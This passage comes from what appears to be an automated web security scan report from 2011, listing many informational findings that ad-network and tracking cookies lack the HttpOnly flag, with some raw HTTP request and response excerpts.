RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.128. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.129. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1103
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:39:52 GMT;path=/;httponly

document.write ('<script type="text/javascript" language="javascript">\n');
document.write ('var fd_clk = ');
document.write ("'");
document.write ('http://network.realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

11.130. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.131. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.132. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018RL; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.133. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3104
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:39:40 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

11.134. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P1018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.135. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018RL|O1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.136. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.137. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.138. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:43:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 430
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:44:50 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1838096624/Top1/USNetwork/BCN2011020713_001_AllMenus/ROCK_RETARGETING_728x90.jpg/72
...[SNIP]...

11.139. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.140. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO5018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.141. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018HS|O2018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.142. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.143. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Thu, 16-Jun-2011 12:54:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=11953^3; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=72322; path=/; domain=.rubiconproject.com
csi15=3187871.js^2^1308225219^1308225277&3206204.js^1^1308225202^1308225202; expires=Thu, 23-Jun-2011 11:54:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.144. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Thu, 16-Jun-2011 13:25:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=11953^3; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=70473; path=/; domain=.rubiconproject.com
csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; expires=Thu, 23-Jun-2011 12:25:26 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.145. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Thu, 16-Jun-2011 16:36:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=11953^45; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=58996; path=/; domain=.rubiconproject.com
csi15=1300434.js^3^1308237982^1308238603&2553663.js^13^1308234261^1308238600&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; expires=Thu, 23-Jun-2011 15:36:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.146. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Thu, 16-Jun-2011 16:26:21 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=11953^37; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=59618; path=/; domain=.rubiconproject.com
csi2=1300433.js^2^1308237983^1308237981&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; expires=Thu, 23-Jun-2011 15:26:21 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308237977515&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; rdk2=0; ses2=11953^37; csi2=2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

11.147. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Thu, 16-Jun-2011 17:18:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=11953^53; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=56512; path=/; domain=.rubiconproject.com
csi15=1300434.js^11^1308237982^1308241087&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; expires=Thu, 23-Jun-2011 16:18:07 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x306e40.js&size_id=15&account_id=6451&site_id=11953&size=300x250&cb=0.9354042278137058 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; ses2=11953^42; csi2=1300433.js^6^1308237983^1308240767&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; rdk=6451/11953; rdk15=0; ses15=11953^53; csi15=3173952.js^1^1308241079^1308241079&1300434.js^9^1308237982^1308240770&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

11.148. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=6451/11953; expires=Thu, 16-Jun-2011 17:23:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=11953^43; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=56202; path=/; domain=.rubiconproject.com
csi2=1300433.js^8^1308237983^1308241397&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; expires=Thu, 23-Jun-2011 16:23:17 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.149. http://p.opt.fimserve.com/bht/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.opt.fimserve.com
Path:	/bht/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LO=00M86ezxm1O00Of500o0U9eXGJ; Domain=.opt.fimserve.com; Expires=Thu, 15-Sep-2011 11:22:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.150. http://pbid.pro-market.net/engine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/engine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

anProfile=3ndgyg+0+s0=(4m)+h=5m+1m=1+rv=(-5)+rt='ADC1D6F3'+rs=c+1f=d+4=2m1; Domain=.pro-market.net; Expires=Sat, 13-Aug-2011 13:27:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.151. http://phoenix.untd.com/TRCK/RGST previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://phoenix.untd.com
Path:	/TRCK/RGST

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WHRE=1884D_1:125D82_0_18B1D; expires=Sun, 13 Jun 2021 13:08:41 GMT; domain=.untd.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.152. http://pix04.revsci.net/D10889/a1/0/3/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10889/a1/0/3/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab0cAaYOpnwIMBLA0IVDPklGA4cG8987irB0kMgiihI/CdBBO2IqsXUHg2YYHfbCkyKF/JXks5u+heEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxar0dCcOUA19iyGVNLDYDF86x87PdcgYejEsUMdc2duPgOIx4rC7FyfGZpR7epenDDvIYvU27qvwht6FQASYws3bEqTCb6mh0vFu5mv8ReFLS8QXn+IWxW7m5aAgGHm2bnArmy/4uwEVzAZjnz24jkctfnCjS5euFKL3iDkoJI/ct+G/wLS8oYtzmwSQz4WtIaMJS6ZzXU6W6T4PnyP+04ymqVnaXUUohAvRWfA5UlTq201l+zeZyALT/lxcdZ9sYAdOtvd7Pbatf3qOhxgyea4FsRMsjoCWdCdCAo1Nm69/xrxuMUQTnEllUqVkYOht6hw3rHSREYVYzAThKsQEjjeiIFQDQYO0CUfi4Yh8QS0GgMRrvlR+/1ZigwL1TRawPE58a6Q91W0qYNyQFvPAF0O/xS6EHhD4tyHCg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:23 GMT; Path=/
rtc_ZXjK=MLvP+AcpJjhn55IUHe+wKkSBED5lJjb29L6daJXtsfNIrV8SCAnWzVAf9nbTHtmn8REGCSI4PHlm5XgsATUN9aW3OcI/Uabkejc0WuofJQIzxivBefkZWA6VPMzkY500zZz/G5Cb/oeGnxlp1EGKaaJ2ozd8KrxdkYYxovM2/VjpJfnhKs2ZFOYrtv1B2iebFSMLfcoiUHAlhy4kOaZrzGHsuXDclkQoxmhIZB8C32EzcIBK+qLKn2eoITJwC2w0LYFDaetEGumv4RUXqWEdArSuQbl5RDI5QFUAyEq+hM3oqYT9fO9vrd3yBn6SdrIOb66G9vYy/jht2Z5pM+5ejFaRifdenJctGbhbKFW5OXUCsYGyIfHO5RNPxfv+2fwcY/BJlFOoXBEW0YoEkEHerIDxNfJsXGWVE0rvLfJsOucfSfp9RTRBW0t2hnNeUw3t26uAAkJT6HFJOal4E08ky1sMgLdiWAnCigi9Te7QgkdIrFjQgOl0R3d13IM3xApFMn5DV+QNrjyhCT7zWzwEz54BppS7sSl2eBWvX/KLHrYBANWlRZFG8hFGK0A2A4e6RuAcJiuKFiZPNiwA/zmSJZoGzrb+4ZwKc5dupCfhWEMAwtHnGUl2GZISt05VaPlVX8ZzDH+p0DgSmmAOQ1DT7uLUOmIh/08wKhf/xL3t6WeBuBL7fDIa0JwAwwly1hNwWO2NmqIiREn2uGWVf0wqCy7pXIkrhYHE1da8+jh2fCZ5FhF3kW8KkEpzJyvhdxs4+AMWvVEMNuIQgXIhgmBpUEjtumCO0a2GWruXMUDPkkbRC4gYDhtfEeqPAbKZ+mgTRcNjJK2eqPPJpN0i60YmGVRMn/P154PumWQdNrGS+l7PEUaABoiq6Dh5h3yjzP+Yl10ALB5SBsYxa5gBc5yNdMTolfRZIVrniYVuGmUIUiAMy/oqOJ1ytZprZjJMqfRsk9t6GH2eijzk6GyoHzudi2oEglUNNzqpIHYQ16iJQqUjjKEzqLgEvtoTR2faQKldXE3OtoaL5UXL4qqgIxVuA1bC/OdaTFbkUiFGjjC9kfu060ookh5ac5HFYOMol3ahbeEJzT2ssIFzOWV0Li6mi9ZHRPLypb/pCtSR5S6Cf2xfjQo/P1v1C+hRnUXaAnbVSXk/lf823gVY/zFElC8NLo7so88DXrxIrsbTi/cJDKvCrrU8hF+lCVcmzgb+6jmnU1KfHMAPPFZVIotrptfpWNauuAJJVpcorhs0PrBJw0Yjdi7d13RzEzK57rScD+lcl5NbDuN/DIkPKphDQrQ1PCQscoH1LYRpQO2O8T2RLL1fujBfr7064q84Kst3994/qUfiA2C642C++BRA7DjZN/LPwaDlt89ggPtRAFz3izzBeidZdZ5Zl0+UgA2Nto/rY5IFctzhc5uf+a3d/7rSLxoDnDIPCjrgIgNc1NEwLbMv3r3hPYmAJVblm90bO8Pw8JEvuSqzaLLgXp02mk53zJ19ONoJx0GRTzPt0JgMXYYzrEaU+SW5P/+aqMe1fUU5N8qCZmry8tj2oJnxOEMH0Vgn4p5oMhpImcV2hy94TWjG5LSGbTPWc6XLKvr+Q2ecyPj7K28Z5J3FsWB8WtKye